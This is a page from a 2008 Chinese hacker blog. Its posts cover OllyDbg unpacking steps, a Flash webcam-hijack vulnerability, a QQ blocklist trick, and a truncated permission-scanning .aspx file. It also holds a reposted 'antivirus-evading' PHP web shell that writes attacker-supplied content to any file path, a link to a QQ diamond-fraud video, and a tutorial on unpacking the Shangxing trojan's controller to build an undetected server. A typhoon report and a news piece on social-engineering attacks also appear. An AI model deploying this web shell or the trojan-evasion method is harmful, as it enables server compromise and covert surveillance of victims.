西疯's Blog

2008-10-23 1:54:27 阅读(6) 评论(0)

单步跟踪法:

1.OD载入，不分析代码。

2.近CALL—F7，远CALL—F8，实现向下的跳转。

3.有回跳处，下一句代码处—F4 （右键—代码断点运行到所选）

4.大的跳转（大跨段，JMP***或JE***或RETN），很快就会到OEP

ESP定律法:

1.F8，观察OD右上角寄存器中ESP有没有实现（红色）

2.命令行下 DD ******（当前代码ESP值），回车

3.DD就选中下端地址，断点—硬件访问—DWORD断点，F9运行，到跳转处按F8 到DEP

一步到达OPE法:

阅读(6) | 评论(0) | 阅读全文>>

Flash强制启动视频漏洞模拟攻击录像

2008-10-16 0:49:36 阅读(12) 评论(0)

利用"Flash强制启动视频"漏洞远程控制你的摄像头和麦克风，通过javascript在网页中执行一个简单的Flash游戏，骗取用户点击这个游戏，而每点击一次，都会被引导到恶意链接上，在这个过程中你自己完全不会察觉。直到你的摄像头和麦克风都被黑客控制，然后你的一切都会被黑客看到。

视频地址:http://www.youtube.com/watch?v=gxyLbpldmuU

阅读(12) | 评论(0) | 阅读全文>>

防止别人把你拖入QQ黑名单的方法

2008-10-14 2:40:17 阅读(14) 评论(0)

大家知道，如果你的QQ好友不再认为你是“好友”，而将你拉入黑名单当中，则你发送的任何QQ消息都将不会响应到对方QQ，并且你在下次重新登录QQ时，对方的头像图标也将会在你的好友列表中消失。
理论上对方删不删你是对方的自由，而你同不同意对方删你则是你的自由。如果你不愿对方删你，则你可以通过下面的方法迫使对方将你重新加对方为好友：

首先从 QQ 的“系统消息”记录中找到对方好友请求你通过身份验证的那则系统消息记录，然后双击，在接下来弹出的“系统消息”对话框中分别单击“通过验证”和“加为好友”按钮，则你的 QQ 头像图标又会不知不觉地出现在对方好友列表中了。怎么样？是不是挺绝的？对方说不定还正在纳闷呢！

但是，如果你的系统消息没有保留，或者是你主动请求对方通过身份验证和对方设置允许任何人列为好友就找不到这条消息了。

阅读(14) | 评论(0) | 阅读全文>>

扫权限.aspx文件

2008-10-11 2:00:17 阅读(18) 评论(0)

扫权限.aspx

<%@ Page Language="C#" ValidateRequest="false" %>

<%@ Import Namespace="System.IO" %>

<%@ Import Namespace="System.Text" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

阅读(18) | 评论(0) | 阅读全文>>

转：夹烟改写的一只免杀PHP小马

2008-9-28 3:27:11 阅读(21) 评论(0)

夹烟同学的~~

<?php

if ($_POST)

{

$f=fopen($_POST["Y"],"w");

if(fwrite($f,$_POST["S"]))

echo "<font color=red>Success</font>";

else

echo "<font color=blue>UnSuccess</font>";

}

else

echo $_SERVER["SCRIPT_FILENAME"]?>

阅读(21) | 评论(0) | 阅读全文>>

跳板软件刷7钻+会员

2008-9-28 3:17:16 阅读(22) 评论(0)

呵呵，看题目就知道这是一个刷钻的动画，现在很多人都喜欢这些，所以我就找了一个。这是一个最新的动画，但我不保证你们看了动画自己照做就能成功~~ 但是能给大家一点经验吧~~希望能从动画中找到自己的思路来刷钻吧~~

下载：（目标另存为）http://download.anqn.com/2008/tiaoban7zhuy--anqn.com.rar

阅读(22) | 评论(0) | 阅读全文>>

强台风黑格比最新路径图及走向分析

2008-9-25 2:55:43 阅读(8) 评论(0)

强台风黑格比最新路径图及走向分析

今年第１４号强热带风暴“黑格比”已于２１日下午加强为台风。２１日１４时，“黑格比”中心位于台湾省恒春东南方８００公里的洋面上（即北纬１７．２度，东经１２６．５度），中心最低气压９７５百帕，中心附近最大风速３３米每秒（１２级，相当于１１９公里／小时）。据广东省气象台预报，“黑格比”将于２４日袭击广东省。

阅读(8) | 评论(0) | 阅读全文>>

机遇型攻击是指在特定的时间、地点、事件环境的条件下，采取专门的工具进行入侵与破坏的手段，它属于社会工程攻击的一种，而在2008年将会频繁出现。
时髦的攻击

作为社会工程攻击的一种，机遇型攻击的切入点往往具备出其不意的特征。事实上，以往发动此类攻击的黑客往往对于国际时事、国内热点问题、以及一些关系国计民生的议题颇感兴趣。

目前来看，引发今年机遇攻击的两大热点问题主要包括了：北京奥运会和美国总统选举。前者是一次国际瞩目的盛会，后者则是世界上综合国力最强国家的重大变革。

目前很多安全专家表示，有证据显示进入1月份以来，大量中国和美国的互联网站点被僵尸程序控制，人们担心这是在为日后的机遇攻击储备“弹药”。

两大热点

此前Websense 公司安全研究副总裁Dan

阅读(7) | 评论(0) | 阅读全文>>

转：让上兴也能自动生成免杀服务端(图)

2008-9-23 22:29:44 阅读(68) 评论(0)

此文章已发表在《非安全黑客手册》2008年第5期杂志上
后经作者发布在博客上，如转载请务必保留此信息！
Lupin
还有几个月就要高考了，家里的宽带撤了，只能练练破解和免杀，今天要免杀的是上兴4.5，要过的杀软是瑞星。我的思路是将上兴控制端中的木马母体文件——HOOKMM区块导出进行免杀，再导回，就可以自动生成免杀服务端。
一．脱壳
上兴的控制端是加了壳的，好在ASPACK这个壳很好脱，可以用我在网上找到的脱壳机进行脱壳，也可以手动脱壳，我来说一下手动脱壳，用OD载入上兴控制端rejoice.exe，按F8直到右边的寄存器窗口中ESP和EIP同时变红时，在ESP上点右键再点击“数据窗口中跟随”，再在数据窗口点右键，依次选择“断点” “硬件访问” “字”（有的版本是WORD），然后按F9让程序运行起来，再按两次F8到达OEP，在该句代码处点右键，接着点”Dump debugged process” 在新出现的窗口中点击Dump，保存为rejoice.exe，用ResScope载入rejoice.exe,选择RCData下的HOOKMM，再用工具栏上的导出命令将其导出为HOOKMM.EXE（图2）。